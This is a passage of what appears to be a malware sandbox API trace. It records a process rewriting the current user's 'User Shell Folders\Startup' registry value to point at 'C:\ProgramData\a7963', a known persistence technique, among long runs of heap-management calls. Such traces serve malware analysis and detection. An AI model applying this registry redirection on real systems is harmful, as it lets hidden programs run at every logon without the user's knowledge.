returned="\\User Shell Folders" [0122.657] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0122.657] StrChrIW (lpStart="User Shell Folders", wMatch=0x5c) returned 0x0 [0122.657] RtlRestoreLastWin32Error () returned 0x75f000 [0122.657] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0122.657] RtlRestoreLastWin32Error () returned 0x75f000 [0122.657] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0122.657] GetProcessHeap () returned 0xbc0000 [0122.657] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0xc, Size=0x8c) returned 0xbc9590 [0122.657] GetProcessHeap () returned 0xbc0000 [0122.657] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0xc, Size=0xb8) returned 0xbc9a68 [0122.657] GetProcessHeap () returned 0xbc0000 [0122.657] GetProcessHeap () returned 0xbc0000 [0122.657] HeapValidate (hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbc3e60) returned 1 [0122.657] GetProcessHeap () returned 0xbc0000 [0122.657] RtlSizeHeap (HeapHandle=0xbc0000, Flags=0x0, MemoryPointer=0xbc3e60) returned 0x28 [0122.657] RtlFreeHeap (HeapHandle=0xbc0000, Flags=0x0, BaseAddress=0xbc3e60) returned 1 [0122.657] GetProcessHeap () returned 0xbc0000 [0122.657] GetProcessHeap () returned 0xbc0000 [0122.657] HeapValidate (hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbc94f0) returned 1 [0122.657] GetProcessHeap () returned 0xbc0000 [0122.657] RtlSizeHeap (HeapHandle=0xbc0000, Flags=0x0, MemoryPointer=0xbc94f0) returned 0x96 [0122.657] RtlFreeHeap (HeapHandle=0xbc0000, Flags=0x0, BaseAddress=0xbc94f0) returned 1 [0122.657] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/v", cchCount2=-1) returned 1 [0122.658] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="-v", cchCount2=-1) returned 1 [0122.658] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/ve", cchCount2=-1) returned 1 [0122.658] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="-ve", cchCount2=-1) returned 1 [0122.658] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/t", cchCount2=-1) returned 1 [0122.658] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="-t", cchCount2=-1) returned 1 [0122.658] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/s", cchCount2=-1) returned 1 [0122.658] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="-s", cchCount2=-1) returned 1 [0122.658] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/d", cchCount2=-1) returned 3 [0122.658] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="-d", cchCount2=-1) returned 1 [0122.658] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/f", cchCount2=-1) returned 2 [0122.658] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/v", cchCount1=-1, lpString2="/v", cchCount2=-1) returned 2 [0122.658] lstrlenW (lpString="Startup") returned 7 [0122.658] GetProcessHeap () returned 0xbc0000 [0122.658] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0xc, Size=0x10) returned 0xbc7e30 [0122.658] lstrlenW (lpString="Startup") returned 7 [0122.658] StrChrW (lpStart=" \x09", wMatch=0x53) returned 0x0 [0122.658] StrChrW (lpStart=" \x09", wMatch=0x53) returned 0x0 [0122.658] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0122.658] StrChrW (lpStart=" \x09", wMatch=0x61) returned 0x0 [0122.658] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0122.658] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0122.658] StrChrW (lpStart=" \x09", wMatch=0x75) returned 0x0 [0122.658] StrChrW (lpStart=" \x09", wMatch=0x70) returned 0x0 [0122.658] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/t", cchCount1=-1, lpString2="/v", cchCount2=-1) returned 1 [0122.658] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/t", cchCount1=-1, lpString2="-v", cchCount2=-1) returned 1 [0122.658] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/t", cchCount1=-1, lpString2="/ve", cchCount2=-1) returned 1 [0122.658] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/t", cchCount1=-1, lpString2="-ve", cchCount2=-1) returned 1 [0122.658] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/t", cchCount1=-1, lpString2="/t", cchCount2=-1) returned 2 [0122.658] StrDupW (lpSrch="REG_SZ") returned="REG_SZ" [0122.658] lstrlenW (lpString="REG_SZ") returned 6 [0122.658] StrChrW (lpStart=" \x09", wMatch=0x52) returned 0x0 [0122.658] StrChrW (lpStart=" \x09", wMatch=0x52) returned 0x0 [0122.658] StrChrW (lpStart=" \x09", wMatch=0x45) returned 0x0 [0122.658] StrChrW (lpStart=" \x09", wMatch=0x47) returned 0x0 [0122.658] StrChrW (lpStart=" \x09", wMatch=0x5f) returned 0x0 [0122.658] StrChrW (lpStart=" \x09", wMatch=0x53) returned 0x0 [0122.659] StrChrW (lpStart=" \x09", wMatch=0x5a) returned 0x0 [0122.659] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="REG_SZ", cchCount1=-1, lpString2="REG_SZ", cchCount2=-1) returned 2 [0122.659] LocalFree (hMem=0xbc7e90) returned 0x0 [0122.659] RtlRestoreLastWin32Error () returned 0x75f000 [0122.659] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="/v", cchCount2=-1) returned 1 [0122.659] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="-v", cchCount2=-1) returned 1 [0122.659] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="/ve", cchCount2=-1) returned 1 [0122.659] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="-ve", cchCount2=-1) returned 1 [0122.659] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="/t", cchCount2=-1) returned 1 [0122.659] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="-t", cchCount2=-1) returned 1 [0122.659] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="/s", cchCount2=-1) returned 1 [0122.659] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="-s", cchCount2=-1) returned 1 [0122.659] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="/d", cchCount2=-1) returned 2 [0122.659] lstrlenW (lpString="C:\\ProgramData\\a7963") returned 20 [0122.659] GetProcessHeap () returned 0xbc0000 [0122.659] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0xc, Size=0x2a) returned 0xbc3e60 [0122.659] RtlRestoreLastWin32Error () returned 0x75f000 [0122.659] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2001f, lpSecurityAttributes=0x0, phkResult=0x83fe3c, lpdwDisposition=0x83fe0c | out: phkResult=0x83fe3c*=0xe8, lpdwDisposition=0x83fe0c*=0x2) returned 0x0 [0122.659] RegQueryValueExW (in: hKey=0xe8, lpValueName="Startup", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0122.659] GetProcessHeap () returned 0xbc0000 [0122.659] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0xc, Size=0x14) returned 0xbc45a0 [0122.659] GetProcessHeap () returned 0xbc0000 [0122.659] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0xc, Size=0x14) returned 0xbc4360 [0122.659] GetProcessHeap () returned 0xbc0000 [0122.659] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0xc, Size=0x10) returned 0xbc7ed8 [0122.659] _memicmp (_Buf1=0xbc7ed8, _Buf2=0xec1b8c, _Size=0x7) returned 0 [0122.659] GetProcessHeap () returned 0xbc0000 [0122.659] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0xc, Size=0x200) returned 0xbc9b28 [0122.659] LoadStringW (in: hInstance=0x0, uID=0xca, lpBuffer=0xbc9b28, cchBufferMax=256 | out: lpBuffer="Value %s exists, overwrite(Yes/No)? ") returned 0x24 [0122.661] lstrlenW (lpString="Value %s exists, overwrite(Yes/No)? ") returned 36 [0122.661] GetProcessHeap () returned 0xbc0000 [0122.661] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0xc, Size=0x4a) returned 0xbc94f0 [0122.661] _memicmp (_Buf1=0xbc7ed8, _Buf2=0xec1b8c, _Size=0x7) returned 0 [0122.661] LoadStringW (in: hInstance=0x0, uID=0xce, lpBuffer=0xbc9b28, cchBufferMax=256 | out: lpBuffer="YNA") returned 0x3 [0122.661] lstrlenW (lpString="YNA") returned 3 [0122.661] GetProcessHeap () returned 0xbc0000 [0122.661] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0xc, Size=0x8) returned 0xbc4df0 [0122.661] lstrlenW (lpString="C:\\ProgramData\\a7963") returned 20 [0122.661] RegSetValueExW (in: hKey=0xe8, lpValueName="Startup", Reserved=0x0, dwType=0x1, lpData="C:\\ProgramData\\a7963", cbData=0x2a | out: lpData="C:\\ProgramData\\a7963") returned 0x0 [0122.661] RegCloseKey (hKey=0xe8) returned 0x0 [0122.662] GetProcessHeap () returned 0xbc0000 [0122.662] GetProcessHeap () returned 0xbc0000 [0122.662] HeapValidate (hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbc9590) returned 1 [0122.662] GetProcessHeap () returned 0xbc0000 [0122.662] RtlSizeHeap (HeapHandle=0xbc0000, Flags=0x0, MemoryPointer=0xbc9590) returned 0x8c [0122.662] RtlFreeHeap (HeapHandle=0xbc0000, Flags=0x0, BaseAddress=0xbc9590) returned 1 [0122.662] GetProcessHeap () returned 0xbc0000 [0122.662] GetProcessHeap () returned 0xbc0000 [0122.662] HeapValidate (hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbc9a68) returned 1 [0122.662] GetProcessHeap () returned 0xbc0000 [0122.662] RtlSizeHeap (HeapHandle=0xbc0000, Flags=0x0, MemoryPointer=0xbc9a68) returned 0xb8 [0122.662] RtlFreeHeap (HeapHandle=0xbc0000, Flags=0x0, BaseAddress=0xbc9a68) returned 1 [0122.662] GetProcessHeap () returned 0xbc0000 [0122.662] GetProcessHeap () returned 0xbc0000 [0122.662] HeapValidate (hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbc7e30) returned 1 [0122.662] GetProcessHeap () returned 0xbc0000 [0122.662] RtlSizeHeap (HeapHandle=0xbc0000, Flags=0x0, MemoryPointer=0xbc7e30) returned 0x10 [0122.662] RtlFreeHeap (HeapHandle=0xbc0000, Flags=0x0, BaseAddress=0xbc7e30) returned 1 [0122.662] GetProcessHeap () returned 0xbc0000 [0122.662] GetProcessHeap () returned 0xbc0000 [0122.662] HeapValidate (hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbc3e60) returned 1 [0122.662] GetProcessHeap () returned 0xbc0000 [0122.662] RtlSizeHeap (HeapHandle=0xbc0000, Flags=0x0, MemoryPointer=0xbc3e60) returned 0x2a [0122.662] RtlFreeHeap (HeapHandle=0xbc0000, Flags=0x0, BaseAddress=0xbc3e60) returned 1 [0122.662] RtlRestoreLastWin32Error () returned 0x75f000 [0122.662] GetLastError () returned 0x0 [0122.662] FormatMessageW (in: dwFlags=0x1300, lpSource=0x0, dwMessageId=0x0, dwLanguageId=0x0, lpBuffer=0x83fde8, nSize=0x0, Arguments=0x0 | out: lpBuffer="㹠¼ﺸ\x83⩿ì宼ì೨²") returned 0x27 [0122.663] GetLastError () returned 0x0 [0122.663] lstrlenW (lpString="The operation completed successfully.\r\n") returned 39 [0122.663] GetProcessHeap () returned 0xbc0000 [0122.663] GetProcessHeap () returned 0xbc0000 [0122.663] HeapValidate (hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbc4938) returned 1 [0122.663] GetProcessHeap () returned 0xbc0000 [0122.663] RtlSizeHeap (HeapHandle=0xbc0000, Flags=0x0, MemoryPointer=0xbc4938) returned 0x2 [0122.663] RtlFreeHeap (HeapHandle=0xbc0000, Flags=0x0, BaseAddress=0xbc4938) returned 1 [0122.663] GetProcessHeap () returned 0xbc0000 [0122.663] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0xc, Size=0x50) returned 0xbc9a68 [0122.663] RtlRestoreLastWin32Error () returned 0x75f000 [0122.663] LocalFree (hMem=0xbc3e60) returned 0x0 [0122.663] __iob_func () returned 0x75872608 [0122.663] _fileno (_File=0x75872628) returned 1 [0122.663] _errno () returned 0xb205b0 [0122.663] _get_osfhandle (_FileHandle=1) returned 0x90 [0122.663] _errno () returned 0xb205b0 [0122.663] GetFileType (hFile=0x90) returned 0x2 [0122.663] GetStdHandle (nStdHandle=0xfffffff5) returned 0x90 [0122.663] GetFileType (hFile=0x90) returned 0x2 [0122.663] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0x83fdb8 | out: lpMode=0x83fdb8) returned 1 [0122.665] __iob_func () returned 0x75872608 [0122.665] GetStdHandle (nStdHandle=0xfffffff5) returned 0x90 [0122.665] lstrlenW (lpString="The operation completed successfully.\r\n") returned 39 [0122.665] WriteConsoleW (in: hConsoleOutput=0x90, lpBuffer=0xbc9a68*, nNumberOfCharsToWrite=0x27, lpNumberOfCharsWritten=0x83fddc, lpReserved=0x0 | out: lpBuffer=0xbc9a68*, lpNumberOfCharsWritten=0x83fddc*=0x27) returned 1 [0122.683] GetProcessHeap () returned 0xbc0000 [0122.683] GetProcessHeap () returned 0xbc0000 [0122.683] HeapValidate (hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbc9b28) returned 1 [0122.683] GetProcessHeap () returned 0xbc0000 [0122.683] RtlSizeHeap (HeapHandle=0xbc0000, Flags=0x0, MemoryPointer=0xbc9b28) returned 0x200 [0122.683] RtlFreeHeap (HeapHandle=0xbc0000, Flags=0x0, BaseAddress=0xbc9b28) returned 1 [0122.683] GetProcessHeap () returned 0xbc0000 [0122.683] GetProcessHeap () returned 0xbc0000 [0122.683] HeapValidate (hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbc7ed8) returned 1 [0122.683] GetProcessHeap () returned 0xbc0000 [0122.683] RtlSizeHeap (HeapHandle=0xbc0000, Flags=0x0, MemoryPointer=0xbc7ed8) returned 0x10 [0122.683] RtlFreeHeap (HeapHandle=0xbc0000, Flags=0x0, BaseAddress=0xbc7ed8) returned 1 [0122.683] GetProcessHeap () returned 0xbc0000 [0122.683] GetProcessHeap () returned 0xbc0000 [0122.683] HeapValidate (hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbc4360) returned 1 [0122.683] GetProcessHeap () returned 0xbc0000 [0122.683] RtlSizeHeap (HeapHandle=0xbc0000, Flags=0x0, MemoryPointer=0xbc4360) returned 0x14 [0122.683] RtlFreeHeap (HeapHandle=0xbc0000, Flags=0x0, BaseAddress=0xbc4360) returned 1 [0122.683] GetProcessHeap () returned 0xbc0000 [0122.683] GetProcessHeap () returned 0xbc0000 [0122.683] HeapValidate (hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbc44b0) returned 1 [0122.683] GetProcessHeap () returned 0xbc0000 [0122.683] RtlSizeHeap (HeapHandle=0xbc0000, Flags=0x0, MemoryPointer=0xbc44b0) returned 0x9c [0122.683] RtlFreeHeap (HeapHandle=0xbc0000, Flags=0x0, BaseAddress=0xbc44b0) returned 1 [0122.683] GetProcessHeap () returned 0xbc0000 [0122.683] GetProcessHeap () returned 0xbc0000 [0122.683] HeapValidate (hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbc7e18) returned 1 [0122.683] GetProcessHeap () returned 0xbc0000 [0122.683] RtlSizeHeap (HeapHandle=0xbc0000, Flags=0x0, MemoryPointer=0xbc7e18) returned 0x10 [0122.683] RtlFreeHeap (HeapHandle=0xbc0000, Flags=0x0, BaseAddress=0xbc7e18) returned 1 [0122.683] GetProcessHeap () returned 0xbc0000 [0122.684] GetProcessHeap () returned 0xbc0000 [0122.684] HeapValidate (hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbc4730) returned 1 [0122.684] GetProcessHeap () returned 0xbc0000 [0122.684] RtlSizeHeap (HeapHandle=0xbc0000, Flags=0x0, MemoryPointer=0xbc4730) returned 0x14 [0122.684] RtlFreeHeap (HeapHandle=0xbc0000, Flags=0x0, BaseAddress=0xbc4730) returned 1 [0122.684] GetProcessHeap () returned 0xbc0000 [0122.684] GetProcessHeap () returned 0xbc0000 [0122.684] HeapValidate (hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbc4118) returned 1 [0122.684] GetProcessHeap () returned 0xbc0000 [0122.684] RtlSizeHeap (HeapHandle=0xbc0000, Flags=0x0, MemoryPointer=0xbc4118) returned 0x1e [0122.684] RtlFreeHeap (HeapHandle=0xbc0000, Flags=0x0, BaseAddress=0xbc4118) returned 1 [0122.684] GetProcessHeap () returned 0xbc0000 [0122.684] GetProcessHeap () returned 0xbc0000 [0122.684] HeapValidate (hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbc7da0) returned 1 [0122.684] GetProcessHeap () returned 0xbc0000 [0122.684] RtlSizeHeap (HeapHandle=0xbc0000, Flags=0x0, MemoryPointer=0xbc7da0) returned 0x10 [0122.684] RtlFreeHeap (HeapHandle=0xbc0000, Flags=0x0, BaseAddress=0xbc7da0) returned 1 [0122.684] GetProcessHeap () returned 0xbc0000 [0122.684] GetProcessHeap () returned 0xbc0000 [0122.684] HeapValidate (hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbc4710) returned 1 [0122.684] GetProcessHeap () returned 0xbc0000 [0122.684] RtlSizeHeap (HeapHandle=0xbc0000, Flags=0x0, MemoryPointer=0xbc4710) returned 0x14 [0122.684] RtlFreeHeap (HeapHandle=0xbc0000, Flags=0x0, BaseAddress=0xbc4710) returned 1 [0122.684] GetProcessHeap () returned 0xbc0000 [0122.684] GetProcessHeap () returned 0xbc0000 [0122.684] HeapValidate (hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbc9a68) returned 1 [0122.684] GetProcessHeap () returned 0xbc0000 [0122.684] RtlSizeHeap (HeapHandle=0xbc0000, Flags=0x0, MemoryPointer=0xbc9a68) returned 0x50 [0122.684] RtlFreeHeap (HeapHandle=0xbc0000, Flags=0x0, BaseAddress=0xbc9a68) returned 1 [0122.684] GetProcessHeap () returned 0xbc0000 [0122.684] GetProcessHeap () returned 0xbc0000 [0122.684] HeapValidate (hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbc4670) returned 1 [0122.684] GetProcessHeap () returned 0xbc0000 [0122.684] RtlSizeHeap (HeapHandle=0xbc0000, Flags=0x0, MemoryPointer=0xbc4670) returned 0x14 [0122.684] RtlFreeHeap (HeapHandle=0xbc0000, Flags=0x0, BaseAddress=0xbc4670) returned 1 [0122.684] GetProcessHeap () returned 0xbc0000 [0122.684] GetProcessHeap () returned 0xbc0000 [0122.684] HeapValidate (hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbc94f0) returned 1 [0122.685] GetProcessHeap () returned 0xbc0000 [0122.685] RtlSizeHeap (HeapHandle=0xbc0000, Flags=0x0, MemoryPointer=0xbc94f0) returned 0x4a [0122.685] RtlFreeHeap (HeapHandle=0xbc0000, Flags=0x0, BaseAddress=0xbc94f0) returned 1 [0122.685] GetProcessHeap () returned 0xbc0000 [0122.685] GetProcessHeap () returned 0xbc0000 [0122.685] HeapValidate (hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbc4430) returned 1 [0122.685] GetProcessHeap () returned 0xbc0000 [0122.685] RtlSizeHeap (HeapHandle=0xbc0000, Flags=0x0, MemoryPointer=0xbc4430) returned 0x14 [0122.685] RtlFreeHeap (HeapHandle=0xbc0000, Flags=0x0, BaseAddress=0xbc4430) returned 1 [0122.685] GetProcessHeap () returned 0xbc0000 [0122.685] GetProcessHeap () returned 0xbc0000 [0122.685] HeapValidate (hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbc4df0) returned 1 [0122.685] GetProcessHeap () returned 0xbc0000 [0122.685] RtlSizeHeap (HeapHandle=0xbc0000, Flags=0x0, MemoryPointer=0xbc4df0) returned 0x8 [0122.685] RtlFreeHeap (HeapHandle=0xbc0000, Flags=0x0, BaseAddress=0xbc4df0) returned 1 [0122.685] GetProcessHeap () returned 0xbc0000 [0122.685] GetProcessHeap () returned 0xbc0000 [0122.685] HeapValidate (hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbc4b50) returned 1 [0122.685] GetProcessHeap () returned 0xbc0000 [0122.685] RtlSizeHeap (HeapHandle=0xbc0000, Flags=0x0, MemoryPointer=0xbc4b50) returned 0x14 [0122.685] RtlFreeHeap (HeapHandle=0xbc0000, Flags=0x0, BaseAddress=0xbc4b50) returned 1 [0122.685] GetProcessHeap () returned 0xbc0000 [0122.685] GetProcessHeap () returned 0xbc0000 [0122.685] HeapValidate (hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbc4b70) returned 1 [0122.685] GetProcessHeap () returned 0xbc0000 [0122.685] RtlSizeHeap (HeapHandle=0xbc0000, Flags=0x0, MemoryPointer=0xbc4b70) returned 0x14 [0122.685] RtlFreeHeap (HeapHandle=0xbc0000, Flags=0x0, BaseAddress=0xbc4b70) returned 1 [0122.685] GetProcessHeap () returned 0xbc0000 [0122.685] GetProcessHeap () returned 0xbc0000 [0122.685] HeapValidate (hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbc7e60) returned 1 [0122.685] GetProcessHeap () returned 0xbc0000 [0122.685] RtlSizeHeap (HeapHandle=0xbc0000, Flags=0x0, MemoryPointer=0xbc7e60) returned 0x10 [0122.685] RtlFreeHeap (HeapHandle=0xbc0000, Flags=0x0, BaseAddress=0xbc7e60) returned 1 [0122.685] GetProcessHeap () returned 0xbc0000 [0122.685] GetProcessHeap () returned 0xbc0000 [0122.685] HeapValidate (hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbc4b90) returned 1 [0122.685] GetProcessHeap () returned 0xbc0000 [0122.685] RtlSizeHeap (HeapHandle=0xbc0000, Flags=0x0, MemoryPointer=0xbc4b90) returned 0x14 [0122.685] RtlFreeHeap (HeapHandle=0xbc0000, Flags=0x0, BaseAddress=0xbc4b90) returned 1 [0122.686] GetProcessHeap () returned 0xbc0000 [0122.686] GetProcessHeap () returned 0xbc0000 [0122.686] HeapValidate (hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbc4010) returned 1 [0122.686] GetProcessHeap () returned 0xbc0000 [0122.686] RtlSizeHeap (HeapHandle=0xbc0000, Flags=0x0, MemoryPointer=0xbc4010) returned 0x14 [0122.686] RtlFreeHeap (HeapHandle=0xbc0000, Flags=0x0, BaseAddress=0xbc4010) returned 1 [0122.686] GetProcessHeap () returned 0xbc0000 [0122.686] GetProcessHeap () returned 0xbc0000 [0122.686] HeapValidate (hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbc4030) returned 1 [0122.686] GetProcessHeap () returned 0xbc0000 [0122.686] RtlSizeHeap (HeapHandle=0xbc0000, Flags=0x0, MemoryPointer=0xbc4030) returned 0x14 [0122.686] RtlFreeHeap (HeapHandle=0xbc0000, Flags=0x0, BaseAddress=0xbc4030) returned 1 [0122.686] GetProcessHeap () returned 0xbc0000 [0122.686] GetProcessHeap () returned 0xbc0000 [0122.686] HeapValidate (hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbc4050) returned 1 [0122.686] GetProcessHeap () returned 0xbc0000 [0122.686] RtlSizeHeap (HeapHandle=0xbc0000, Flags=0x0, MemoryPointer=0xbc4050) returned 0x14 [0122.686] RtlFreeHeap (HeapHandle=0xbc0000, Flags=0x0, BaseAddress=0xbc4050) returned 1 [0122.686] GetProcessHeap () returned 0xbc0000 [0122.686] GetProcessHeap () returned 0xbc0000 [0122.688] HeapValidate (hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbc7e78) returned 1 [0122.688] GetProcessHeap () returned 0xbc0000 [0122.688] RtlSizeHeap (HeapHandle=0xbc0000, Flags=0x0, MemoryPointer=0xbc7e78) returned 0x10 [0122.688] RtlFreeHeap (HeapHandle=0xbc0000, Flags=0x0, BaseAddress=0xbc7e78) returned 1 [0122.688] GetProcessHeap () returned 0xbc0000 [0122.688] GetProcessHeap () returned 0xbc0000 [0122.688] HeapValidate (hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbc46f0) returned 1 [0122.688] GetProcessHeap () returned 0xbc0000 [0122.688] RtlSizeHeap (HeapHandle=0xbc0000, Flags=0x0, MemoryPointer=0xbc46f0) returned 0x14 [0122.688] RtlFreeHeap (HeapHandle=0xbc0000, Flags=0x0, BaseAddress=0xbc46f0) returned 1 [0122.688] GetProcessHeap () returned 0xbc0000 [0122.688] GetProcessHeap () returned 0xbc0000 [0122.688] HeapValidate (hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbc4bd0) returned 1 [0122.688] GetProcessHeap () returned 0xbc0000 [0122.688] RtlSizeHeap (HeapHandle=0xbc0000, Flags=0x0, MemoryPointer=0xbc4bd0) returned 0x14 [0122.688] RtlFreeHeap (HeapHandle=0xbc0000, Flags=0x0, BaseAddress=0xbc4bd0) returned 1 [0122.688] GetProcessHeap () returned 0xbc0000 [0122.688] GetProcessHeap () returned 0xbc0000 [0122.688] HeapValidate (hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbc45a0) returned 1 [0122.688] GetProcessHeap () returned 0xbc0000 [0122.688] RtlSizeHeap (HeapHandle=0xbc0000, Flags=0x0, MemoryPointer=0xbc45a0) returned 0x14 [0122.688] RtlFreeHeap (HeapHandle=0xbc0000, Flags=0x0, BaseAddress=0xbc45a0) returned 1 [0122.688] GetProcessHeap () returned 0xbc0000 [0122.688] GetProcessHeap () returned 0xbc0000 [0122.688] HeapValidate (hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbc7d88) returned 1 [0122.688] GetProcessHeap () returned 0xbc0000 [0122.688] RtlSizeHeap (HeapHandle=0xbc0000, Flags=0x0, MemoryPointer=0xbc7d88) returned 0x10 [0122.689] RtlFreeHeap (HeapHandle=0xbc0000, Flags=0x0, BaseAddress=0xbc7d88) returned 1 [0122.689] GetProcessHeap () returned 0xbc0000 [0122.689] GetProcessHeap () returned 0xbc0000 [0122.689] HeapValidate (hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbc4bf0) returned 1 [0122.689] GetProcessHeap () returned 0xbc0000 [0122.689] RtlSizeHeap (HeapHandle=0xbc0000, Flags=0x0, MemoryPointer=0xbc4bf0) returned 0x14 [0122.689] RtlFreeHeap (HeapHandle=0xbc0000, Flags=0x0, BaseAddress=0xbc4bf0) returned 1 [0122.689] GetProcessHeap () returned 0xbc0000 [0122.689] GetProcessHeap () returned 0xbc0000 [0122.689] HeapValidate (hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbc7e48) returned 1 [0122.689] GetProcessHeap () returned 0xbc0000 [0122.689] RtlSizeHeap (HeapHandle=0xbc0000, Flags=0x0, MemoryPointer=0xbc7e48) returned 0x10 [0122.689] RtlFreeHeap (HeapHandle=0xbc0000, Flags=0x0, BaseAddress=0xbc7e48) returned 1 [0122.689] exit (_Code=0) Thread: id = 75 os_tid = 0xc58